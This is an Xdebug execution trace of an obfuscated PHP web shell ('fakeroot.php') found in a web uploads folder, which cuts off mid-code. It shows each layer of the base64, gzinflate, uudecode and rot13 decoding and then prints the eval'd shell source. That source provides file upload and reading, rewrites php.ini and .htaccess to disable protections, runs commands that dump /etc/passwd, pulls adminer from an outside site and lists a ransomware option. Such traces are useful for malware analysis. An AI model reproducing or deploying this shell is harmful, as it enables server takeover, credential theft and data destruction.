Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:55:27.931893]
1	0	1	0.000222	393528
1	3	0	0.000421	421968	{main}	1		/var/www/html/uploads/fakeroot.php	0	0
2	4	0	0.000441	421968	ini_set	0		/var/www/html/uploads/fakeroot.php	2	2	'‘output_buffering’'	0
2	4	1	0.000460	422040
2	4	R			FALSE
2	5	0	0.000495	421968	ini_set	0		/var/www/html/uploads/fakeroot.php	3	2	'‘display_errors’'	0
2	5	1	0.000513	422040
2	5	R			FALSE
1		A						/var/www/html/uploads/fakeroot.php	5	$heker = 'HZxHgqtKFEPnvQtyztnkDMbknNn/Kj7vz3qCXa66ko5o7BIxqvnzKRkEwe8AJ60gynQYioeN9lab2i8D83XFMX+1/bGwmKX3HXCNS5uNHxb8lVS9X+K09S2nH92GP/AOAsNpWcDR4donRdgqRTELP9bKlxbkoDvMjECuRgNHOv7KYUOIWuu0RaOD5tcrc5qn9vOdd6+Hmq5OehNMOXkVK7wEaHlsWP/KEu9nsLv/Xu0DQ+1yMl1RrOJusB48Sg2rWvmj+XaBgXvWm2ZoGnGFuBAanOXq5+ZRUtV6mvKvrKAxqyuHhxi+AEtitUykXo9kv8JukXB3x+dMkovRKrBQQEwgKlDKRmIOHWsG/iu5iIO3AHrGD3JAR3s7bMy1w0KBTayW9CDiuVkyVxn3g8LBVgL91iNiCXNO1JN4dy0Y1muns8CNjbrGTKPUQDzEBySmcnEPRo3hLs+I8UvtJvKOfBoT8gf7qmMlZn9l3ZV3N7CkYcY8GSBSBAkfQUYfGl8l'
2	6	0	0.000567	421968	base64_decode	0		/var/www/html/uploads/fakeroot.php	7	1	'HZxHgqtKFEPnvQtyztnkDMbknNn/Kj7vz3qCXa66ko5o7BIxqvnzKRkEwe8AJ60gynQYioeN9lab2i8D83XFMX+1/bGwmKX3HXCNS5uNHxb8lVS9X+K09S2nH92GP/AOAsNpWcDR4donRdgqRTELP9bKlxbkoDvMjECuRgNHOv7KYUOIWuu0RaOD5tcrc5qn9vOdd6+Hmq5OehNMOXkVK7wEaHlsWP/KEu9nsLv/Xu0DQ+1yMl1RrOJusB48Sg2rWvmj+XaBgXvWm2ZoGnGFuBAanOXq5+ZRUtV6mvKvrKAxqyuHhxi+AEtitUykXo9kv8JukXB3x+dMkovRKrBQQEwgKlDKRmIOHWsG/iu5iIO3AHrGD3JAR3s7bMy1w0KBTayW9CDiuVkyVxn3g8LBVgL91iNiCXNO1JN4dy0Y1muns8CNjbrGTKPUQDzEBySmcnEPRo3hLs+I8UvtJvKOfBoT8gf7qmMlZn9l3ZV3N7CkYcY8GSBSBAkfQUYfGl8l'
2	6	1	0.000660	446576
2	6	R			'\035GJ\024C\vr\f*>z]h\0221)\031\004\000\' t\030V/\003u1\035pK\037\026T_-\037݆?\016\002iY\'E*E1\v?ʗ\026;̌@F\003G:aCZE+swNz\023L9y\025+\004hylX\022g^\003Cr2]Qn\036<J\rZv{֛fh\032q\020\032QRz򯬠1+\030\000KbL^dnpwL*P@L *PFb\016\035k\006+\000z\017r@G{;l̵BM Y2W\031V\002#b\tsNԓxw-\030kL@<\a$rq\017F.ψK&|\032\023\ac%feݕw7a<\031 R\004\t\037A'
2	7	0	0.001011	446544	gzinflate	0		/var/www/html/uploads/fakeroot.php	7	1	'\035GJ\024C\vr\f*>z]h\0221)\031\004\000\' t\030V/\003u1\035pK\037\026T_-\037݆?\016\002iY\'E*E1\v?ʗ\026;̌@F\003G:aCZE+swNz\023L9y\025+\004hylX\022g^\003Cr2]Qn\036<J\rZv{֛fh\032q\020\032QRz򯬠1+\030\000KbL^dnpwL*P@L *PFb\016\035k\006+\000z\017r@G{;l̵BM Y2W\031V\002#b\tsNԓxw-\030kL@<\a$rq\017F.ψK&|\032\023\ac%feݕw7a<\031 R\004\t\037A'
2	7	1	0.001449	471152
2	7	R			'M%9NW::M-%%(_B(*<BDH8$#ETZ,@Y=+[^9\'A85>;LO=:<\'E.,[[!?9^7W9L\'B\nM+O[^2VZSQ/8\\RZ(`$["!T]<<!\\R(7:G%.NG&\'<(\\YNA3X%\\,R\';D"/O&B>3\\\nMTZ%)O7R7X7,BPLS5WGIG=`JW[@S#PROFS;"G/4Y2N(M!,4UP.A^HF@L9.[A\\\nMA!TO?/4,N+.5?Z$8B`5O$67ML,0QX$!_W8PPTPP2Y#/C#T>X^SWP`5G6<`PM\nMN#UHON>0#-0K"M)Y<;%OY\\F[^CRX3(?[(WH34KU<K\'C1%;!DK&+=%E/&UO-$\nM/D/$ZB#`U:%\\#\\Q_>.E/QTX+"PE6M,T2(I;M-^MEST5/$<F#LY\\D.);WF6])\nM+BTY^[,HB?E9OO\';9M7"(C(T%E+I2[BU7-/^@9E(^6RV*_DA,\'1I`\'J6UN2H\nMORM_RT.*9;E0*B%3D#1:14&`,(Y3)2H>-SGE3N1!]IXF$*0LL*<'
2	8	0	0.001506	446544	convert_uudecode	0		/var/www/html/uploads/fakeroot.php	7	1	'M%9NW::M-%%(_B(*<BDH8$#ETZ,@Y=+[^9\'A85>;LO=:<\'E.,[[!?9^7W9L\'B\nM+O[^2VZSQ/8\\RZ(`$["!T]<<!\\R(7:G%.NG&\'<(\\YNA3X%\\,R\';D"/O&B>3\\\nMTZ%)O7R7X7,BPLS5WGIG=`JW[@S#PROFS;"G/4Y2N(M!,4UP.A^HF@L9.[A\\\nMA!TO?/4,N+.5?Z$8B`5O$67ML,0QX$!_W8PPTPP2Y#/C#T>X^SWP`5G6<`PM\nMN#UHON>0#-0K"M)Y<;%OY\\F[^CRX3(?[(WH34KU<K\'C1%;!DK&+=%E/&UO-$\nM/D/$ZB#`U:%\\#\\Q_>.E/QTX+"PE6M,T2(I;M-^MEST5/$<F#LY\\D.);WF6])\nM+BTY^[,HB?E9OO\';9M7"(C(T%E+I2[BU7-/^@9E(^6RV*_DA,\'1I`\'J6UN2H\nMORM_RT.*9;E0*B%3D#1:14&`,(Y3)2H>-SGE3N1!]IXF$*0LL*<'
2	8	1	0.001568	467056
2	8	R			'\025iM\024R?J\030\0209t9tdxXU֜\036S_gf.Kn<ˢ\000\023\034\ä]:\035<S_\fv\bƉӡI|s"zgt\n\f+Ͱ=NRA1Mp:\037\v\031;|\035/|\f\030\005o\021e1@݌0\f\0223\017G=\001Yp\f-=h\f+\nyqoɻ<L#z\023R\\x\025db\026SD>C ա|\017xON\v\v\tV\022"7eEO\021Ƀ$8oI.-9(Yf"24\026RK\\Hl+!0ti\000z䨿+CeP*!S4ZEA0S%*\03679NA&\020,8hAX\\\000O[=JjD\002t`\' sN=gנ\03'
2	9	0	0.001919	442448	str_rot13	0		/var/www/html/uploads/fakeroot.php	7	1	'\025iM\024R?J\030\0209t9tdxXU֜\036S_gf.Kn<ˢ\000\023\034\ä]:\035<S_\fv\bƉӡI|s"zgt\n\f+Ͱ=NRA1Mp:\037\v\031;|\035/|\f\030\005o\021e1@݌0\f\0223\017G=\001Yp\f-=h\f+\nyqoɻ<L#z\023R\\x\025db\026SD>C ա|\017xON\v\v\tV\022"7eEO\021Ƀ$8oI.-9(Yf"24\026RK\\Hl+!0ti\000z䨿+CeP*!S4ZEA0S%*\03679NA&\020,8hAX\\\000O[=JjD\002t`\' sN=gנ\03'
2	9	1	0.002280	462960
2	9	R			'\025vZ\024E?W\030\0209g9gqkKH֜\036F_ts.Xa<ˢ\000\023\034\ä]:\035<F_\fi\bƉӡV|f"mtg\n\f+Ͱ=AEN1Zc:\037\v\031;|\035/|\f\030\005b\021r1@݌0\f\0223\017T=\001Lc\f-=u\f+\nldbɻ<Y#m\023E\\k\025qo\026FQ>P ա|\017kBA\v\v\tI\022"7rRB\021Ƀ$8bV.-9(Ls"24\026EX\\Uy+!0gv\000m䨿+PrC*!F4MRN0F%*\03679AN&\020,8uNK\\\000B[=WwQ\002g`\' fA=tנ\03'
2	10	0	0.002631	442448	gzinflate	0		/var/www/html/uploads/fakeroot.php	7	1	'\025vZ\024E?W\030\0209g9gqkKH֜\036F_ts.Xa<ˢ\000\023\034\ä]:\035<F_\fi\bƉӡV|f"mtg\n\f+Ͱ=AEN1Zc:\037\v\031;|\035/|\f\030\005b\021r1@݌0\f\0223\017T=\001Lc\f-=u\f+\nldbɻ<Y#m\023E\\k\025qo\026FQ>P ա|\017kBA\v\v\tI\022"7rRB\021Ƀ$8bV.-9(Ls"24\026EX\\Uy+!0gv\000m䨿+PrC*!F4MRN0F%*\03679AN&\020,8uNK\\\000B[=WwQ\002g`\' fA=tנ\03'
2	10	1	0.003046	467056
2	10	R			'HZxXlqNKEET/exeAACGsQHjvvfee/a/i1bzPnm4OZTIj4kIx5S6PupYx21EZ+JbYSGtsDH7pEN0jLwVTBDp6Y4PrRtR3tBeThkOOU5gBzc4yjv/KGxekKOjOovy0gpeJ4uDdn1SUXzNc+xcrFz0Z+ZG6qGdMuQHnWD/VrsOXcMO7/FcOA/KDxzu5m/arunXQ1jvNFlD2c/Ng80MR2qQZSydkhvuDpN1lubjaKLwT4kj3r+R54ljTj12njUV3FWKHgu6/rS8VU/dErfT0uu9Gq70I9RC6H4ctxCTDyqf0Y7F/pVaa54dlcKPgT9IStyqKaPyoVOEtdLQ4Y7XOqKKkC1jQTPRE/cQgVdctKduGBvcu+jcbh7nNzrFxJ0b3DdS7KX4679978SW2BSM8aL5Zid8U07t7lUMG67JGCvHpv5JqXYwxfSj6FGva7lJeb+5U5GjgydUhkYdVVGDOl/lVa/BrcWeNrl+qj9g5h/JXbl1F3TqXimzhvM+Y/9q225PN'
2	11	0	0.003090	446544	base64_decode	0		/var/www/html/uploads/fakeroot.php	7	1	'HZxXlqNKEET/exeAACGsQHjvvfee/a/i1bzPnm4OZTIj4kIx5S6PupYx21EZ+JbYSGtsDH7pEN0jLwVTBDp6Y4PrRtR3tBeThkOOU5gBzc4yjv/KGxekKOjOovy0gpeJ4uDdn1SUXzNc+xcrFz0Z+ZG6qGdMuQHnWD/VrsOXcMO7/FcOA/KDxzu5m/arunXQ1jvNFlD2c/Ng80MR2qQZSydkhvuDpN1lubjaKLwT4kj3r+R54ljTj12njUV3FWKHgu6/rS8VU/dErfT0uu9Gq70I9RC6H4ctxCTDyqf0Y7F/pVaa54dlcKPgT9IStyqKaPyoVOEtdLQ4Y7XOqKKkC1jQTPRE/cQgVdctKduGBvcu+jcbh7nNzrFxJ0b3DdS7KX4679978SW2BSM8aL5Zid8U07t7lUMG67JGCvHpv5JqXYwxfSj6FGva7lJeb+5U5GjgydUhkYdVVGDOl/lVa/BrcWeNrl+qj9g5h/JXbl1F3TqXimzhvM+Y/9q225PN'
2	11	1	0.003180	471152
2	11	R			'\035WJ\020D{\027\000!@xռϞn\016e2#B1.1Q\031Hkl\f~\020#/\005S\004:zcFw\027CS\0012\033\027(΢ݟT_3\\\027+\027=\031gL\001X?ծ×pûW\016\003;u;\026Ps`C\021ڤ\031K\'de(\023HyXӏ]Ew\025b/\025SDF\b\020\037-$ʧcVepO\022*hT-t8cΨ\vXLD U-)ۆ\006.7\033αq\'F\rԻ)~:{%\005#<hY\024ӻ{C\006F\n鿒j]1}(\024kR^oTh!UT`ΗUkkqg_9Wn]E:lϘڶۓ\vρ]\037>5['
2	12	0	0.003513	446544	gzinflate	0		/var/www/html/uploads/fakeroot.php	7	1	'\035WJ\020D{\027\000!@xռϞn\016e2#B1.1Q\031Hkl\f~\020#/\005S\004:zcFw\027CS\0012\033\027(΢ݟT_3\\\027+\027=\031gL\001X?ծ×pûW\016\003;u;\026Ps`C\021ڤ\031K\'de(\023HyXӏ]Ew\025b/\025SDF\b\020\037-$ʧcVepO\022*hT-t8cΨ\vXLD U-)ۆ\006.7\033αq\'F\rԻ)~:{%\005#<hY\024ӻ{C\006F\n鿒j]1}(\024kR^oTh!UT`ΗUkkqg_9Wn]E:lϘڶۓ\vρ]\037>5['
2	12	1	0.003909	471152
2	12	R			'M[7U;:J.Z\\N<\'ZH?#Q<Z.\'^;!-S#$8&83-F(&TAAF,1U?X=-"E008.T%J]MGG\nM_\'36FDR]LM*Q3BJ55TB_*I57$W"OC^/7LS+FCF9X9]G,AD0@>49?OE$3_"[7\nMTT#4"U_H_PQ19AODQO[-/L!J4AKDZCE5!Z6W&IV#W"S\\+-AXX^0O<LB]!0+A\nM22)\\YI*?OIP>-RN#?E3;C(>1,G,_V,Y-V$__P:OBF%B#-SUTZE&6<>KVI*>/\nM:M=]*/.\'<L2]+>5ZNFF-\'\\N93(3R-5W&O;.956;3&DPV-V,45DI9YZHMQP-A\nMLS(/GEK?/WG<_H<R1D9_PL4;2C_[L1)ZX&)B!W_/62Z8=B_S90#T>^>U,#C-\nM,QA&.=C!F*LYIQ[6KOZAVLK%DB7N\\6+\\>LN#W"^=19OIQ[5[/<RSXN*5R@\\8\nMZRN,_;0I5/L@(]G21??AS+P$U?X\\%[RSGYO5/`O/OA`>/$JZ>4G:"?H_S'
2	13	0	0.003996	446544	convert_uudecode	0		/var/www/html/uploads/fakeroot.php	7	1	'M[7U;:J.Z\\N<\'ZH?#Q<Z.\'^;!-S#$8&83-F(&TAAF,1U?X=-"E008.T%J]MGG\nM_\'36FDR]LM*Q3BJ55TB_*I57$W"OC^/7LS+FCF9X9]G,AD0@>49?OE$3_"[7\nMTT#4"U_H_PQ19AODQO[-/L!J4AKDZCE5!Z6W&IV#W"S\\+-AXX^0O<LB]!0+A\nM22)\\YI*?OIP>-RN#?E3;C(>1,G,_V,Y-V$__P:OBF%B#-SUTZE&6<>KVI*>/\nM:M=]*/.\'<L2]+>5ZNFF-\'\\N93(3R-5W&O;.956;3&DPV-V,45DI9YZHMQP-A\nMLS(/GEK?/WG<_H<R1D9_PL4;2C_[L1)ZX&)B!W_/62Z8=B_S90#T>^>U,#C-\nM,QA&.=C!F*LYIQ[6KOZAVLK%DB7N\\6+\\>LN#W"^=19OIQ[5[/<RSXN*5R@\\8\nMZRN,_;0I5/L@(]G21??AS+P$U?X\\%[RSGYO5/`O/OA`>/$JZ>4G:"?H_S'
2	13	1	0.004058	467056
2	13	R			'}[j\aΎ\03770`f\0236b\006\030f1\035_B\004\030;Ajt֚LұN*WH*W\023p׳2fxğD yF_Q\023.@\v_\fQf\033>jR\0329U\a\032,,x/rȽ\005\002I"|撟\0367+~Tی2s?MOX7=tQqj}(rĽ-zi\037˙L5]ƽUf\032L67c\024VJY-\003a2\017Z?y2FF\033J?\022zbb\aY.v/e\000{083\030F99\036֮Œ%bz˃/Eǵ{=̳\017\030+)T #E̼\004<\027<\vϾ\020\036<JyI\t?\005\nNi%\003X \a\b\032u\016I\025҃'
2	14	0	0.004365	442448	str_rot13	0		/var/www/html/uploads/fakeroot.php	7	1	'}[j\aΎ\03770`f\0236b\006\030f1\035_B\004\030;Ajt֚LұN*WH*W\023p׳2fxğD yF_Q\023.@\v_\fQf\033>jR\0329U\a\032,,x/rȽ\005\002I"|撟\0367+~Tی2s?MOX7=tQqj}(rĽ-zi\037˙L5]ƽUf\032L67c\024VJY-\003a2\017Z?y2FF\033J?\022zbb\aY.v/e\000{083\030F99\036֮Œ%bz˃/Eǵ{=̳\017\030+)T #E̼\004<\027<\vϾ\020\036<JyI\t?\005\nNi%\003X \a\b\032u\016I\025҃'
2	14	1	0.004674	458864
2	14	R			'}[w\aΎ\03770`s\0236o\006\030s1\035_O\004\030;Nwg֚YұA*JU*J\023c׳2skt̆Q lS_D\023.@\v_\fDs\033>wE\0329H\a\032,,k/eȽ\005\002V"|撟\0367+~Gی2f?ZBK7=gDdw}(eĽ-mv\037˙Y5]ƽHs\032Y67p\024IWL-\003n2\017M?l2SS\033W?\022moo\aL.i/r\000{083\030S99\036֮Œ%om˃/Rǵ{=̳\017\030+)G #R̼\004<\027<\vϾ\020\036<WlV\t?\005\nAv%\003K \a\b\032h\016V\025҃'
2	15	0	0.005039	438352	gzinflate	0		/var/www/html/uploads/fakeroot.php	7	1	'}[w\aΎ\03770`s\0236o\006\030s1\035_O\004\030;Nwg֚YұA*JU*J\023c׳2skt̆Q lS_D\023.@\v_\fDs\033>wE\0329H\a\032,,k/eȽ\005\002V"|撟\0367+~Gی2f?ZBK7=gDdw}(eĽ-mv\037˙Y5]ƽHs\032Y67p\024IWL-\003n2\017M?l2SS\033W?\022moo\aL.i/r\000{083\030S99\036֮Œ%om˃/Rǵ{=̳\017\030+)G #R̼\004<\027<\vϾ\020\036<WlV\t?\005\nAv%\003K \a\b\032h\016V\025҃'
2	15	1	0.005626	483440
2	15	R			'DQoNCi8vIC0tLSBwaHAgc2hlbGwgDQoNCnNlc3Npb25fc3RhcnQoKTsgDQplcnJvcl9yZXBvcnRpbmcoMCk7IA0Kc2V0X3RpbWVfbGltaXQoMCk7DQoNCiAgICAgICAgDQplY2hvICc8IURPQ1RZUEUgSFRNTD4NCjxodG1sPg0KPGhlYWQ+PHRpdGxlPi4vRkFLRSBST09UIFNIRUxMPC90aXRsZT4NCjxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9pbmZvY29uLm9yZy9jb25zL0JsYWNrJTIwSGF0L0JsYWNrJTIwSGF0JTIwTG9nbyUyMHNtYWxsLmpwZyI+DQo8bGluayBocmVmPSJodHRwczovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9S2VsbHkrU2xhYiIgcmVsPSJzdHlsZXNoZWV0Ij4NCjxsaW5rIGhyZWY9Imh0dHBzOi8vZm9udHMuZ29vZ2xlYXBpcy5j'
2	16	0	0.005713	467024	base64_decode	0		/var/www/html/uploads/fakeroot.php	7	1	'DQoNCi8vIC0tLSBwaHAgc2hlbGwgDQoNCnNlc3Npb25fc3RhcnQoKTsgDQplcnJvcl9yZXBvcnRpbmcoMCk7IA0Kc2V0X3RpbWVfbGltaXQoMCk7DQoNCiAgICAgICAgDQplY2hvICc8IURPQ1RZUEUgSFRNTD4NCjxodG1sPg0KPGhlYWQ+PHRpdGxlPi4vRkFLRSBST09UIFNIRUxMPC90aXRsZT4NCjxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9pbmZvY29uLm9yZy9jb25zL0JsYWNrJTIwSGF0L0JsYWNrJTIwSGF0JTIwTG9nbyUyMHNtYWxsLmpwZyI+DQo8bGluayBocmVmPSJodHRwczovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9S2VsbHkrU2xhYiIgcmVsPSJzdHlsZXNoZWV0Ij4NCjxsaW5rIGhyZWY9Imh0dHBzOi8vZm9udHMuZ29vZ2xlYXBpcy5j'
2	16	1	0.005957	512112
2	16	R			'\r\n\r\n// --- php shell \r\n\r\nsession_start(); \r\nerror_reporting(0); \r\nset_time_limit(0);\r\n\r\n        \r\necho \'<!DOCTYPE HTML>\r\n<html>\r\n<head><title>./FAKE ROOT SHELL</title>\r\n<link rel="icon" href="https://infocon.org/cons/Black%20Hat/Black%20Hat%20Logo%20small.jpg">\r\n<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet">\r\n<link href="https://fonts.googleapis.com/css?family=Cinzel:700" rel="stylesheet">\r\n<link rel="stylesheet" type="text/css" href="https:/'
2	17	0	0.007080	621160	eval	1	'\r\n\r\n// --- php shell \r\n\r\nsession_start(); \r\nerror_reporting(0); \r\nset_time_limit(0);\r\n\r\n        \r\necho \'<!DOCTYPE HTML>\r\n<html>\r\n<head><title>./FAKE ROOT SHELL</title>\r\n<link rel="icon" href="https://infocon.org/cons/Black%20Hat/Black%20Hat%20Logo%20small.jpg">\r\n<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet">\r\n<link href="https://fonts.googleapis.com/css?family=Cinzel:700" rel="stylesheet">\r\n<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">\r\n<style>\r\nbody{\r\n\t\r\nfont-family: Kelly Slab;\r\nbackground-color: black;\r\ncolor:white;\r\n}\r\np{\r\n\tword-spacing: 20px;\r\nfont-family: Cinzel;\r\n\r\n}\r\n#content tr:hover{\r\nbackground-color: #0058FF;\r\ntext-shadow:0px 0px 10px #fff;\r\n}\r\n#content .first{\r\nbackground-image:url(https://wallpaper.sc/id/applewatch/wp-content/uploads/2018/08/applewatch-312x390-photoface-wallpaper_01348-312x312.jpg);\r\n}\r\ntable{\r\nborder: 1px #000000 solid;\r\nbackground-image:url(https://img.wallpaper.sc/applewatch/images/312x390/applewatch-312x390-photoface-wallpaper_01351.jpg);\r\n}\r\na{\r\ncolor:white;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:blue;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\n\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n.inpute{\r\n    border-style: solid;\r\n    border-color: white;\r\n    background-color: white;\r\n    color: black;\r\n\tpadding:5px;\r\n    text-align: center;\r\n}\r\n.selecte{\r\n    border-style: solid;\r\n\tpadding:6px;\r\n    border-color:white;\r\n    background-color: #ff751a;\r\n    color: black;\r\n}\r\n.submite{\r\n    border-style: solid;\r\n    border-color: #4CAF50;\r\n    background-color: transparent;\r\n    color: white;\r\n\tpadding:6px;\r\n}\r\n</style>\r\n<center> <img style="width:250px;" src="https://i.ibb.co/0FFSRsn/fakeroot.png"> </font></script> <br><center><br><font color="lime">./Fake Root Shell</font><br><br>\r\n</head>\r\n<div style="height:auto;" >\r\n<body><center>\r\n\t\r\n<div style=" border: 7px double; border-color:orange;height:160px;width:100%; color:white;" ><p>\r\n<a href="?dir=$dir&do=zoneh">ZONE-H </a>\r\n<a href="?dir=$dir&do=youtube">YOUTUBE</a>\r\n<a href="?dir=$dir&votr=cmd">COMMAND</a>\r\n<a href="?dir=$dir&votr=sym">SYMLINK</a>\r\n<a href="?dir=$dir&do=jumping">JUMPING </a><br><br>\r\n<a href="?dir=$dir&do=bypass">BYPASS_DISABLE</a> \r\n<a href="?dir=$dir&do=adminer">ADMINER </a>\r\n<a href="?dir=$dir&do=hash">PASSWORD_HASH</a>\r\n<a href="?dir=$dir&do=ransom">RANSOMWARE</a><br><br>\r\n</p>\r\n</center></div> </center><br></td>\r\n</tr>\r\n<table style="background-color:black;"  >\r\n<tr><td><font style="background-color:black;" color="white"><a style="color:red;" href="?"><img style="height:30px;width:30px;" src="http://www.clker.com/cliparts/c/S/7/m/x/U/gold-house-black-background-clip-art-hi.png"></a> :</font> \';\r\n\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = getcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}echo \'</td></tr><tr><td><br>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<font color="#73FF00">Upload Berhasil</font><br />\';\r\n}else{\r\necho \'<font color="red">Upload Gagal</font><br/>\';\r\n}\r\n}\r\necho \'<form enctype="multipart/form-data" method="POST">\r\n<font color="white">File Upload :</font> <input type="file" name="file" style="font-family:Kelly Slab;font-size:15;background:blue;color:gold;border:2px solid red;"/>\r\n<input type="submit" value="Upload" style="margin-top:4px;height:27px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:gold;border:2px solid red;border-radius:5px"/>\r\n</form>\r\n</td></tr>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td>Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'</tr></td></table><br>\';\r\necho(\'<br><pre>\'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</pre>\');\r\n}\r\n\r\nelseif($_GET[\'do\'] == \'bypass\'){\r\n\t\techo "<center>";\r\n\t\techo "<form method=post><input type=submit name=ini value=\'php.ini\' />&nbsp;<input type=submit name=htce value=\'.htaccess\' /><br><br></form>";\r\n\t\tif(isset($_POST[\'ini\']))\r\n{\r\n\t\t$file = fopen("php.ini","w");\r\n\t\techo fwrite($file,"disable_functions=none\r\nsafe_mode = Off\r\n\t");\r\n\t\tfclose($file);\r\n\t\techo "<a href=\'php.ini\'>click here!</a>";\r\n}\t\tif(isset($_POST[\'htce\']))\r\n{\r\n\t\t$file = fopen(".htaccess","w");\r\n\t\techo fwrite($file,"<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\n</IfModule>\r\n\t");\r\n\t\tfclose($file);\r\n\t\techo "htaccess successfully created!";\r\n}\r\n\t\techo"</center>";\r\n}\r\n\r\nelseif($_GET[\'do\'] == \'adminer\') {\r\n\t$full = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", $dir);\r\n\tfunction adminer($url, $isi) {\r\n\t\t$fp = fopen($isi, "w");\r\n\t\t$ch = curl_init();\r\n\t\t \t  curl_setopt($ch, CURLOPT_URL, $url);\r\n\t\t \t  curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);\r\n\t\t \t  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t \t  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\t\t   \t  curl_setopt($ch, CURLOPT_FILE, $fp);\r\n\t\treturn curl_exec($ch);\r\n\t\t   \t  curl_close($ch);\r\n\t\tfclose($fp);\r\n\t\tob_flush();\r\n\t\tflush();\r\n\t}\r\n\tif(file_exists(\'adminer.php\')) {\r\n\t\techo "<center><font color=lime><a href=\'$full/adminer.php\' target=\'_blank\'>-> adminer login <-</a></font></center>";\r\n\t} else {\r\n\t\tif(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {\r\n\t\t\techo "<center><font color=lime><a href=\'$full/adminer.php\' target=\'_blank\'>-> adminer login <-</a></font></center>";\r\n\t\t} else {\r\n\t\t\techo "<center><font color=red>gagal buat file adminer</font></center>";\r\n\t\t}\r\n\t}\r\n} \r\nelseif($_GET[\'do\'] == \'hash\') {\r\n $submit = $_POST[\'enter\'];\r\n   \r\n if (isset($submit)) {\r\n     \r\n   $pass = $_POST[\'password\']; // password\r\n      \r\n  $salt = \'}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN\'; // random string\r\n \r\n     $hash = md5($pass); // md5 hash #1\r\n   \r\n     \r\n   \r\n    }\r\n    echo \'<center><form action="" method="post"><b> \';\r\necho \'<center><h2><b>-=[ PASSWORD HASH]=-</b></h2></center></tr>\';\r\necho \' <center><b>password yang mau dihash:</b> \';\r\necho \' <input class="inputz" type="text" name="password" size="40" />\'; \r\necho \'<input class="inputzbut" type="submit" name="enter" value="hash" />\';  \r\necho \' <br><br><br>\';\r\necho \' Hasil Hash</th><br><br></center></tr>\'; \r\necho \' Password Original  <input class=inputz type=text size=50 value=\' . $pass . \'> <br><br>\'; \r\necho \' MD5  <input class=inputz type=text size=50 value=\' . $hash . \'> <br><br>\';\r\n    \r\n\r\n\r\nif ($_POST[\'awkuser\']) {\r\necho"<textarea class=\'inputzbut\' cols=\'65\' rows=\'15\'>";\r\necho shell_exec("awk -F: \'{ print $1 }\' /etc/passwd | sort");\r\necho "</textarea><br>";\r\n}\r\nif ($_POST[\'systuser\']) {\r\necho"<textarea class=\'inputzbut\' cols=\'65\' rows=\'15\'>";\r\necho system("ls /var/mail");\r\necho "</textarea><br>";\r\n}\r\nif ($_POST[\'passthuser\']) {\r\necho"<textarea class=\'inputzbut\' cols=\'65\' rows=\'15\'>";\r\necho passthru("ls /var/mail");\r\necho "</textarea><br>";\r\n}\r\nif ($_POST[\'exuser\']) {\r\necho"<textarea class=\'inputzbut\' cols=\'65\' rows=\'15\'>";\r\necho exec("ls /var/mail");\r\necho "</textarea><br>";\r\n}\r\nif ($_POST[\'shexuser\']) {\r\necho"<textarea class=\'inputzbut\' cols=\'65\' rows=\'15\'>";\r\necho shell_exec("ls /var/mail");\r\necho "</textarea><br>";\r\n}\r\nif($_POST[\'syst\'])\r\n{\r\necho"<textarea class=\'inputz\' cols=\'65\' rows=\'15\'>";\r\necho system("cat /etc/passwd");\r\necho"</textarea><br><br><b></b><br>";\r\n}\r\nif($_POST[\'passth\'])\r\n{\r\necho"<textarea class=\'inputz\' cols=\'65\' rows=\'15\'>";\r\necho passthru("cat /etc/passwd");\r\necho"</textarea><br><br><b></b><br>";\r\n}\r\nif($_POST[\'ex\'])\r\n{\r\necho"<textarea class=\'inputz\' cols=\'65\' rows=\'15\'>";\r\necho exec("cat /etc/passwd");\r\necho"</textarea><br><br><b></b><br>";\r\n}\r\nif($_POST[\'shex\'])\r\n{\r\necho"<textarea class=\'inputz\' cols=\'65\' rows=\'15\'>";\r\necho shell_exec("cat /etc/passwd");\r\necho"</textarea><br><br><b></b><br>";\r\n}\r\necho \'<center>\';\r\nif($_POST[\'melex\'])\r\n{\r\necho"<textarea class=\'inputz\' cols=\'65\' rows=\'15\'>";\r\nfor($uid=0;$uid<60000;$uid++){ \r\n$ara = posix_getpwuid($uid);\r\nif (!empty($ara)) {\r\nwhile (list ($key, $val) = each($ara)){\r\nprint "$val:";\r\n}\r\nprint "\\n";\r\n}\r\n}\r\necho"</textarea><br><br>";\r\n}\r\n//\r\n\r\n//\r\n}\r\nelseif($_GET[\'votr\'] == 